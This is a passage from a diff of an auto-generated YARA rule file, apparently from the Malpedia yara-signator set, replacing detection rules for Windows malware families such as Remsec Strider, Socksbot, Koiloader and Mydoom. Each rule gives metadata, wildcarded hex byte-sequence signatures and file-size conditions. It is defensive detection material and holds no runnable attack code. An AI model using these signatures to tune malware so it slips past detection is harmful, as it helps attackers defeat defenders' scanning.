-		$sequence_3 = { 6a00 8d8dd0feffff 51 8b95dcfeffff 52 }
-		$sequence_4 = { 6a0a 8d8df0f7ffff 51 8b5510 52 e8???????? }
-		$sequence_5 = { 8bec 83ec18 c745f8ffffffff c745fc01000000 6a00 }
-		$sequence_6 = { e8???????? 83c40c 8b9590d7feff 52 8b8584d7feff 50 8b8d8cd7feff }
-		$sequence_7 = { 81c1c8000000 b810270000 99 f7f9 8b55f8 8b4df0 8b949124e80000 }
-		$sequence_8 = { 8b9168d40000 81ea00000100 8b45f0 899068d40000 8b4df0 8b916cd40000 }
-		$sequence_9 = { 8b4d08 894dfc 8b55fc 83c20c 8955f4 c645e400 }
+		$sequence_0 = { 6804010000 50 ff15???????? 83c410 6a10 68???????? 8d85fcfeffff }
+		$sequence_1 = { 85d2 7ff4 eb01 42 2bca }
+		$sequence_2 = { 83c420 ff7508 ffd6 8bf8 }
+		$sequence_3 = { 8975fc 5f 395d10 740e 57 }
+		$sequence_4 = { 7d0a 686c090000 e8???????? 8b0f }
+		$sequence_5 = { 7ff4 eb01 42 2bca }
+		$sequence_6 = { 6a50 5e 53 53 53 }
+		$sequence_7 = { 8bd8 ff15???????? 3bdf 5b }
+		$sequence_8 = { ff750c ff7508 56 ff15???????? 56 8bd8 }
+		$sequence_9 = { 68bb0b0000 ebe2 85ff 7507 68bc0b0000 ebd7 }
 
 	condition:
-		7 of them and filesize < 270336
+		7 of them and filesize < 32768
 }
-rule MALPEDIA_Win_Redalpha_Auto : FILE
+rule MALPEDIA_Win_Remsec_Strider_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6a45e264-f0cb-55d8-8d41-9c16d8d716f7"
+		id = "8ffafd3c-1118-56d9-b912-84b2d6b6409b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redalpha"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.redalpha_auto.yar#L1-L230"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.remsec_strider"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.remsec_strider_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "cbf7a84b857c49ee3d81dd7f006e794089e9ad6271126e24c962dedf553b5fc2"
+		logic_hash = "5867115fb4def3b071a615d256fa1eed563d65b07c2fc4fbbe85633ada999202"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -120044,46 +120403,32 @@ rule MALPEDIA_Win_Redalpha_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bc1 b900000000 2bde 7414 8b55fc 03d6 }
-		$sequence_1 = { 2bc2 83fa38 ba???????? 0f42c1 }
-		$sequence_2 = { 33c0 eb04 33f6 8bc1 }
-		$sequence_3 = { 8bc8 c1e903 83e13f 894df4 8d14d8 }
-		$sequence_4 = { 7256 33c9 85f6 7417 8b55f4 }
-		$sequence_5 = { 3bce 72f4 8b5d08 8d5718 }
-		$sequence_6 = { 8b5dfc 03d7 8a0419 88440a18 41 3bce 72f4 }
-		$sequence_7 = { ff4714 8bc3 be40000000 c1e81d 2bf1 }
-		$sequence_8 = { 413bfb 72d8 448b4d88 488b7d68 }
-		$sequence_9 = { 7d09 0fb685443b0100 ebe1 80bd443b010000 }
-		$sequence_10 = { ff15???????? 488bc8 488d542460 ff15???????? 488bf8 }
-		$sequence_11 = { c744247818000000 4c896580 c7458801000000 4533c9 4c8d442478 488d5738 488d4f20 }
-		$sequence_12 = { 458bc6 498bcd e8???????? 488b9c2498040000 4881c440040000 }
-		$sequence_13 = { 4185d3 740c 0f1f440000 d1ea }
-		$sequence_14 = { 488b4c2440 ff15???????? 90 488d8c2460010000 e8???????? 8bc3 }
-		$sequence_15 = { 0f849d000000 488b7928 4885ff 0f8490000000 4883793000 0f8485000000 }
-		$sequence_16 = { 740b 83feff 0f8483000000 eb7d 8b1c9dc4f24000 6800080000 6a00 }
-		$sequence_17 = { 837de404 7412 8d45e0 50 56 ff15???????? }
-		$sequence_18 = { 897c2428 e8???????? 83c410 8d442424 }
-		$sequence_19 = { 7420 6bc618 57 8db8f06f4100 57 }
-		$sequence_20 = { 8b04bd30744100 f644032801 7444 837c0318ff 743d }
-		$sequence_21 = { 8d45f4 64a300000000 683f000f00 6a00 6a00 }
-		$sequence_22 = { 7313 8a8750604100 08441619 42 0fb64101 3bd0 }
-		$sequence_23 = { ff75f8 ff15???????? 837de404 7412 8d45e0 }
+		$sequence_0 = { c9 c20800 33c0 40 83f920 }
+		$sequence_1 = { 50 8d8558faffff 68c8000000 50 ff15???????? 50 }
+		$sequence_2 = { 85c0 7444 8b4818 85c9 7405 }
+		$sequence_3 = { 57 ff5608 85c0 74a7 33c0 40 }
+		$sequence_4 = { 6a0c 58 c3 83f927 7412 83f950 }
+		$sequence_5 = { 7433 48 742c 48 7413 48 7409 }
+		$sequence_6 = { 50 e8???????? 83c418 8d85ecfeffff 50 ff15???????? }
+		$sequence_7 = { dfe0 ddd9 750a f6c441 }
+		$sequence_8 = { 49 7414 49 7411 49 49 7409 }
+		$sequence_9 = { c20400 56 8bf1 6808040000 8d4614 }
 
 	condition:
-		7 of them and filesize < 606208
+		7 of them and filesize < 344064
 }
-rule MALPEDIA_Win_Scanline_Auto : FILE
+rule MALPEDIA_Win_Socksbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "13552250-a8d4-5ee7-b407-74524f6111b2"
+		id = "b5f93aff-75da-58af-bf18-de683a7c9eb8"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scanline"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.scanline_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.socksbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.socksbot_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "2bc008243e0f7161ac1c675c6c0b345104d3837ab2d3042dba054ab6d07a500d"
+		logic_hash = "be6f7343dfb40a0e2f1dec96db93036928644c868cacce36ad5e92217ff2c80d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -120097,32 +120442,32 @@ rule MALPEDIA_Win_Scanline_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 68???????? e8???????? 017c2444 83c40c 03ef 4b 75e1 }
-		$sequence_1 = { 7435 8a1a 4e 42 80fb40 7205 }
-		$sequence_2 = { 8bf1 33c0 394508 898618060000 0f84d6000000 39450c 0f84cd000000 }
-		$sequence_3 = { e8???????? 59 33c0 59 c3 53 56 }
-		$sequence_4 = { ff750c 66c745ec0200 ff15???????? 668945ee 8b4508 8945f0 }
-		$sequence_5 = { f3a5 8bc8 83e103 f3a4 ff7304 e8???????? 8b45fc }
-		$sequence_6 = { 41 ebf7 49 890f 5f 5e 5b }
-		$sequence_7 = { 56 57 8bf1 ff15???????? 8be8 33db }
-		$sequence_8 = { 8d8db4f7ffff 897508 e8???????? 8d85c8feffff 56 50 ff15???????? }
-		$sequence_9 = { 7510 80a11703000000 c6811603000008 eb15 807c24040d 750e c681160300000d }
+		$sequence_0 = { 8b750c 33ff 57 57 6a01 57 }
+		$sequence_1 = { ff15???????? 50 8945fc ff15???????? 8bd8 }
+		$sequence_2 = { 85c0 0f8488000000 03c7 8945f0 }
+		$sequence_3 = { ff15???????? 8bd0 33c9 85d2 7e22 53 }
+		$sequence_4 = { 0f8e22010000 6a20 57 c6043e00 e8???????? 59 }
+		$sequence_5 = { 754f 0fb67304 56 8d4305 50 8d85f0feffff }
+		$sequence_6 = { 50 e8???????? 83c40c 84c0 0f8485000000 6800040000 e8???????? }
+		$sequence_7 = { ff758c e8???????? 8bd8 59 85db 7441 8b4dfc }
+		$sequence_8 = { 8b75fc 53 ff15???????? 57 e8???????? }
+		$sequence_9 = { 8d4609 50 8d4508 50 e8???????? 83c40c 8b7dfc }
 
 	condition:
-		7 of them and filesize < 151552
+		7 of them and filesize < 73728
 }
-rule MALPEDIA_Win_Mpkbot_Auto : FILE
+rule MALPEDIA_Win_Curator_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8f074133-bfc7-504a-bda1-097418743139"
+		id = "fa7637d1-ef72-55c1-9cd8-4047e79769b0"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mpkbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mpkbot_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.curator"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.curator_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "011afed12d8733a7391f09eb1750e489d4da026e534c4eca601c4698788ee6ad"
+		logic_hash = "385564603afac75ab1aef52e96073e79dd684407e092688731815c7fd2379a64"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -120136,32 +120481,32 @@ rule MALPEDIA_Win_Mpkbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 895010 895014 894818 89481c 895020 895024 5d }
-		$sequence_1 = { 50 683f000f00 6a00 ff750c ff7508 ff15???????? 85c0 }
-		$sequence_2 = { 68???????? ff15???????? 68???????? 50 ff15???????? ff750c a3???????? }
-		$sequence_3 = { ffd0 5d c3 68???????? ff15???????? 68???????? }
-		$sequence_4 = { 6689500e 33d2 c70028000000 895010 }
-		$sequence_5 = { ff7508 ff75fc ff15???????? ff75fc 6a00 }
-		$sequence_6 = { 6a18 5a 6689500e 33d2 }
-		$sequence_7 = { 56 68???????? 68???????? ffd7 6a00 }
-		$sequence_8 = { ff750c a3???????? ff7508 ffd0 5d }
-		$sequence_9 = { 8bf0 0fb7450c 50 0fb74508 }
+		$sequence_0 = { 488d0d54500300 ff15???????? 488b0d???????? 4533c0 8bd3 ff15???????? 488d0d35500300 }
+		$sequence_1 = { 448bcf b906000000 e8???????? 488b4b40 488bd3 e8???????? 488b4b48 }
+		$sequence_2 = { 0f8399010000 4c8b4dd8 448b65d0 4c894c2478 488b45c8 488b00 48635010 }
+		$sequence_3 = { 807cfe4100 740a c644fe4201 e8???????? 4084ed 7427 488b4320 }
+		$sequence_4 = { e8???????? 84c0 0f847e030000 e9???????? 4c8b7c2468 488b4608 488945c0 }
+		$sequence_5 = { 74c8 488bd3 4c8d05922a0500 83e23f 488bcb 48c1f906 }
+		$sequence_6 = { 4c8d357eb80800 488d85a0010000 4533e4 4889442428 488d9580080000 4533c9 4489642420 }
+		$sequence_7 = { 4883ec28 488d0da9feffff e8???????? 8905???????? 83f8ff 7425 488d156ad20600 }
+		$sequence_8 = { 48897c2420 440fb6c0 488bd7 488d4def e8???????? 488d4d0f }
+		$sequence_9 = { 0f86cf000000 4183ccff 418bcb 48c1e106 4c89741130 4439741124 0f86a7000000 }
 
 	condition:
-		7 of them and filesize < 139264
+		7 of them and filesize < 1265664
 }
-rule MALPEDIA_Win_Varenyky_Auto : FILE
+rule MALPEDIA_Win_Koiloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ab8f8dd3-9c68-536a-86ec-5c7d9a6bae52"
+		id = "ee5d9fec-2843-5af7-aeb3-cee6becb76b4"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.varenyky"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.varenyky_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.koiloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.koiloader_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "c5bb03c58d8d0a3e4056574270047301338558839b61ccfc4ab3bac90d9c50ac"
+		logic_hash = "4094e110b8bc0bb992d288f6dc9a43aa3cc0b1cd494d242faeb097d68b45bf0d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -120175,32 +120520,32 @@ rule MALPEDIA_Win_Varenyky_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b3d???????? 8b542418 6a00 52 8d8424c0130000 50 55 }
-		$sequence_1 = { e8???????? 83c40c 8d4c2414 51 8d54242c 52 }
-		$sequence_2 = { 8d442430 50 55 ffd7 85c0 0f8668010000 }
-		$sequence_3 = { 8b3d???????? ffd7 6803010000 8d8424a5020000 6a00 50 }
-		$sequence_4 = { 85c9 743d c60100 41 be???????? }
-		$sequence_5 = { 57 e8???????? 83c404 3c33 }
-		$sequence_6 = { e8???????? 83c404 6803010000 8d842445020000 6a00 50 }
-		$sequence_7 = { 6a00 6a06 8d442430 50 55 ffd7 85c0 }
-		$sequence_8 = { 897b04 c7430801000000 e8???????? 6a06 89430c 8d4310 8d897cfa4000 }
-		$sequence_9 = { 8db760fc4000 ff36 e8???????? 83c704 59 8906 83ff28 }
+		$sequence_0 = { 41 83f950 72ec 8d9510ffffff 8d8d90f4ffff e8???????? 8d8d90f4ffff }
+		$sequence_1 = { b9???????? e8???????? 83c410 8945f0 85c0 0f8484030000 8bd0 }
+		$sequence_2 = { 2bf0 8b45e8 03c1 8975e0 8945e8 8bc8 }
+		$sequence_3 = { 83f844 72f5 8b45ec 8945c0 8945c4 33c0 c7458444000000 }
+		$sequence_4 = { 8b5d08 53 6a00 ff15???????? 50 ff15???????? }
+		$sequence_5 = { e8???????? 83c404 8d8d30f2ffff e8???????? 8d8d30f2ffff e8???????? }
+		$sequence_6 = { 8b45c4 c645fb00 8b3d???????? a801 7403 56 ffd7 }
+		$sequence_7 = { 8b4104 03c2 894148 8b4df8 8b55f0 8b7da8 }
+		$sequence_8 = { 03cf 740b 3801 7407 40 803c0100 75f9 }
+		$sequence_9 = { 41 3bca 72ef 8d45f8 c745f800000000 50 8d043a }
 
 	condition:
-		7 of them and filesize < 24846336
+		7 of them and filesize < 101376
 }
-rule MALPEDIA_Win_Unidentified_107_Auto : FILE
+rule MALPEDIA_Win_Scarecrow_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "81c12c66-8304-5991-b574-5a315c388de3"
+		id = "7b0ea4aa-06b5-57ee-9a11-48d883c1ac9c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_107"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_107_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scarecrow"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.scarecrow_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "c653c14e4c7ef56015dec3b1522bf0d3fe051f290ecd82f4142246fe6c534c52"
+		logic_hash = "e0a208d3de2959898d45be13d981ab096036ca0d633a326493a23160fdc8d314"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -120214,32 +120559,32 @@ rule MALPEDIA_Win_Unidentified_107_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4c09f2 4585c0 490f49d0 4829c2 4c8d3c0a 4889f1 }
-		$sequence_1 = { 75dc 4c89e9 4883c420 5b 5e 5f 415c }
-		$sequence_2 = { 85d2 0f8ea1feffff 488b35???????? 31db }
-		$sequence_3 = { 7e96 8b13 4883f80b 0f8f33010000 }
-		$sequence_4 = { 4883ec28 8b05???????? 89cf 4889d6 }
-		$sequence_5 = { 4c89442418 4c894c2420 4883ec64 48c7c12f398d13 e8???????? }
-		$sequence_6 = { 8916 4189d4 4c89c3 85d2 755c 8b05???????? 85c0 }
-		$sequence_7 = { e8???????? 4189c6 85c0 0f84f2000000 4183fc01 0f856e010000 e8???????? }
-		$sequence_8 = { 0f84e6000000 488b05???????? 488d1c9b 48c1e303 4801d8 }
-		$sequence_9 = { 8938 48897008 4c89e1 ff15???????? 488b05???????? }
+		$sequence_0 = { 83c8fc 40 0f85e1010000 0f1f440000 ff45f4 8b45f4 2503000080 }
+		$sequence_1 = { 51 57 ffd0 c6459c00 8bd8 }
+		$sequence_2 = { 8d427f 99 f7fb 885435f1 46 83fe0a 72d9 }
+		$sequence_3 = { c68519feffff2d c6851afeffff37 c6851bfeffff32 c6851cfeffff37 c6851dfeffff26 c6851efeffff37 c6851ffeffff3b }
+		$sequence_4 = { ff75e4 e8???????? 33c0 c745f807000000 668945e4 8945f4 8b451c }
+		$sequence_5 = { c645e603 c645e768 c645e852 c645e960 c645ea75 c645eb5a c645ec66 }
+		$sequence_6 = { 7463 8b8df0feffff 8d4303 03cf 0fafc8 898df0feffff 8b85f0feffff }
+		$sequence_7 = { c6458e34 c6458f38 c6459034 c6459140 c6459234 c6459334 }
+		$sequence_8 = { c7461407000000 c7461000000000 66890e 8b5810 66390f 7414 8bcf }
+		$sequence_9 = { c685a2f9ffff76 8a8595f9ffff 80bd94f9ffff00 7530 33f6 0f1f4000 }
 
 	condition:
-		7 of them and filesize < 254976
+		7 of them and filesize < 501760
 }
-rule MALPEDIA_Win_Gacrux_Auto : FILE
+rule MALPEDIA_Win_Maudi_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "74bca4e5-6c17-575a-bd9e-7779af62a65b"
+		id = "3e4205bc-621f-57ac-9783-0d7a80e63274"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gacrux"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gacrux_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.maudi"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.maudi_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "4b479a315235bf10794aaaf7db4a148e9833fd69e020e24b4a290812be385016"
+		logic_hash = "ae4372c99a5ab8731cfa27286c0755a13272fa053f753c6557e155320ea94c91"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -120253,32 +120598,32 @@ rule MALPEDIA_Win_Gacrux_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7410 44 8bc2 48 8bc6 33d2 49 }
-		$sequence_1 = { e8???????? 48 8bcf e8???????? 8b442450 48 8b5c2458 }
-		$sequence_2 = { 4c 23e9 48 23c1 }
-		$sequence_3 = { 8d4c2438 45 33c0 33d2 }
-		$sequence_4 = { 85c9 0f857bffffff 898d28010000 48 8d8528010000 }
-		$sequence_5 = { 33c9 4d 8d5202 41 8bc9 }
-		$sequence_6 = { 48 83ec40 41 8be8 4c 8bf2 41 }
-		$sequence_7 = { 8b0f e8???????? 48 85c0 751b }
-		$sequence_8 = { b8e9bfac86 48 6bd938 e8???????? 4c 8bcb 4c }
-		$sequence_9 = { 41 8bd4 e8???????? 48 8d4c2430 45 }
+		$sequence_0 = { 5d 8b542408 4a 0f85d9000000 68???????? 87d1 }
+		$sequence_1 = { 87d1 87ca 51 51 51 }
+		$sequence_2 = { 56 55 89e5 5d 89e6 fc ad }
+		$sequence_3 = { 89e5 5d 89e6 fc ad 6804010000 56 }
+		$sequence_4 = { 59 ffe7 6800400000 6a00 57 68???????? }
+		$sequence_5 = { cd03 cd02 68???????? 87d1 87ca 51 }
+		$sequence_6 = { 59 59 ffe7 6800400000 6a00 }
+		$sequence_7 = { 6804010000 56 50 68???????? 87d1 }
+		$sequence_8 = { 59 59 ff25???????? 55 }
+		$sequence_9 = { 5d b986180000 55 89e5 5d be???????? }
 
 	condition:
-		7 of them and filesize < 122880
+		7 of them and filesize < 40960
 }
-rule MALPEDIA_Win_Sys10_Auto : FILE
+rule MALPEDIA_Win_Boldmove_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8102506f-afd2-556d-bce7-166bae2224bf"
+		id = "c0ee40b4-e9c4-5f65-956d-3ab91a0741b7"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sys10"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sys10_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.boldmove"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.boldmove_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "55e8ffe5ea66b378dbdb046d53bca4c06889e1977a823bfc6a76defa2eb61357"
+		logic_hash = "80c35171aa5675e2bb96034cca19e4fa2358df102e187fd20681a49dd8be92d9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -120292,32 +120637,32 @@ rule MALPEDIA_Win_Sys10_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d4c2413 51 6800400000 52 }
-		$sequence_1 = { 8b542408 6a03 50 8b44240c 51 }
-		$sequence_2 = { 53 ff15???????? 8b06 50 e8???????? 8b442418 }
-		$sequence_3 = { 8b442410 8b4c240c 8b542408 6a03 50 }
-		$sequence_4 = { 7407 53 ff15???????? 8b06 50 }
-		$sequence_5 = { 6a03 68???????? 68???????? 51 52 }
-		$sequence_6 = { 52 ffd7 8b4308 50 }
-		$sequence_7 = { 6800400000 52 50 e8???????? 8bf8 83c410 }
-		$sequence_8 = { ff15???????? 8bf8 ffd6 85ff 8b3d???????? }
-		$sequence_9 = { 6810270000 ff15???????? 33c0 59 c20c00 8b442410 c70044020000 }
+		$sequence_0 = { 5f 5d e9???????? c7442404???????? 893424 e8???????? }
+		$sequence_1 = { 83e00f 740f dd442420 dc0cc5e0694100 dd5c2420 83e6f0 0f853d070000 }
+		$sequence_2 = { 8b4da0 89442404 894c2408 8945a0 }
+		$sequence_3 = { 894dcc 8945d0 e8???????? 8b4dcc 8b45d0 }
+		$sequence_4 = { c744240434000000 89442408 c7042411000000 e8???????? 893424 89442404 }
+		$sequence_5 = { 85f6 0f84dd040000 ddd8 ddd8 83fe01 0f845a050000 }
+		$sequence_6 = { 89e5 56 53 8db5f8fbffff 81ec20040000 8b5d10 }
+		$sequence_7 = { 99 f7ff bf04000000 0fb63406 89c8 99 f7ff }
+		$sequence_8 = { 5e 5f 5d c3 55 31c0 b910000000 }
+		$sequence_9 = { 85c0 7408 890424 e8???????? 43 81fb00010000 75e4 }
 
 	condition:
-		7 of them and filesize < 286720
+		7 of them and filesize < 242688
 }
-rule MALPEDIA_Win_Feed_Load_Auto : FILE
+rule MALPEDIA_Win_Jripbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e5e8de31-96f1-50f3-b126-f68009a95e5b"
+		id = "d8a957a2-00cf-53c5-96bc-d79d0345ba47"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.feed_load"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.feed_load_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jripbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.jripbot_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "46de679564e79b2a5c0b197690c16d63fc18a06e57dcb85568ec77e2699570e3"
+		logic_hash = "fc945105d57ad1b4469be79b8a34ff87923dbb08f76d1d337925be7cac82b3ca"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -120331,32 +120676,32 @@ rule MALPEDIA_Win_Feed_Load_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 4863563c 4533c9 4803d6 0fb74a14 4c8d4218 }
-		$sequence_1 = { 7503 4803dd 8bcb 412bcd 8bc1 4983c704 }
-		$sequence_2 = { 33f6 215828 33ff 4533e4 e8???????? 85c0 0f844f010000 }
-		$sequence_3 = { e8???????? 4983ceff 33db 4c8d256cbf0100 895c2420 81fb80000000 }
-		$sequence_4 = { e8???????? 33db 8bf8 85c0 0f8453020000 4c8d2dc25b0100 448bf3 }
-		$sequence_5 = { 7c29 418bc1 488bcf 41f7e5 c1ea07 }
-		$sequence_6 = { 488bc8 ff15???????? 488b4c2428 488d155e2f0300 448b1d???????? 4803c9 }
-		$sequence_7 = { 6683f802 0f852f010000 bb280a0000 448bc3 33d2 488d4c2460 e8???????? }
-		$sequence_8 = { 488d159d650200 488bcb 488905???????? ff15???????? 488d159e650200 488bcb 488905???????? }
-		$sequence_9 = { 488d45e0 4533c9 4889442428 33d2 448975e0 48897c2420 458d4101 }
+		$sequence_0 = { 8bc6 c1c007 33d0 8bc6 c1c806 33d0 8b459c }
+		$sequence_1 = { ffd6 b9???????? 8bc1 83c430 8d5002 668b30 }
+		$sequence_2 = { eb0e c7060c000000 eb06 c7060a000000 8b4d0c c1e905 53 }
+		$sequence_3 = { 83a7a400000000 6a08 59 8b8780000000 8d4401ff fe00 7503 }
+		$sequence_4 = { ff75e8 ffd7 be???????? e8???????? 8d5002 668b08 83c002 }
+		$sequence_5 = { 8b9554ffffff c1c20e c1cb07 33d3 8b9d54ffffff c1eb03 33d3 }
+		$sequence_6 = { 83ec0c 53 33c0 56 57 be???????? }
+		$sequence_7 = { eb16 ff7518 8b4d08 ff7514 ff7510 52 8b550c }
+		$sequence_8 = { 8bf0 83c408 85f6 7412 53 e8???????? 59 }
+		$sequence_9 = { 8bf8 85ff 7410 ff7508 56 57 }
 
 	condition:
-		7 of them and filesize < 512000
+		7 of them and filesize < 507904
 }
-rule MALPEDIA_Win_Beatdrop_Auto : FILE
+rule MALPEDIA_Win_Mydoom_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ff3c4e57-abd7-50b6-b4a8-35e3251008c1"
+		id = "68282348-e634-5e24-a89b-07582d0aeab6"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.beatdrop"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.beatdrop_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mydoom"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mydoom_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "fb95caaadd3d9eb43e82310b2c0d02a31a3bc14c45800fa5e72d0081477812d0"
+		logic_hash = "26adeacf80adc41cd09ac09890246c8c37a7ca914ae80276202f0defea3500e4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -120370,32 +120715,32 @@ rule MALPEDIA_Win_Beatdrop_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 31fa 895110 3351f4 895114 }
-		$sequence_1 = { ff15???????? 488b03 8a10 80fa02 743f }
-		$sequence_2 = { 4883e810 4883c428 5b 5e 5f 5d }
-		$sequence_3 = { 4154 4883ec48 4c8d6c2430 4989cc 4c89e9 e8???????? 4c89ea }
-		$sequence_4 = { 400fb6ff 41339cbd00040000 0fb6fd 4489d9 41339cbd00080000 413394b5000c0000 c1e810 }
-		$sequence_5 = { 4889442458 e8???????? eb0a 4889f1 e8???????? eb8d }
-		$sequence_6 = { 498344241010 eb11 498d4c2408 e8???????? eb05 49ff442418 }
-		$sequence_7 = { c3 4889c8 4c8d998c030000 4889ca 0f1f00 }
-		$sequence_8 = { 89aef8000000 44899efc000000 478b84bc00080000 898e00010000 4181e0000000ff }
-		$sequence_9 = { 4c89e9 e8???????? 4c89e0 4883c450 5b }
+		$sequence_0 = { b800000000 e9???????? 8b830c040000 800801 c744240402000000 8b4304 890424 }
+		$sequence_1 = { 7502 89d0 5d c3 }
+		$sequence_2 = { c7442404???????? 8d9d68ffffff 891c24 e8???????? c744240c28000000 8d8538ffffff 89442408 }
+		$sequence_3 = { b000 f2ae f7d1 49 c781????????2e657865 }
+		$sequence_4 = { 0fb6442eb8 884707 e8???????? 89c6 }
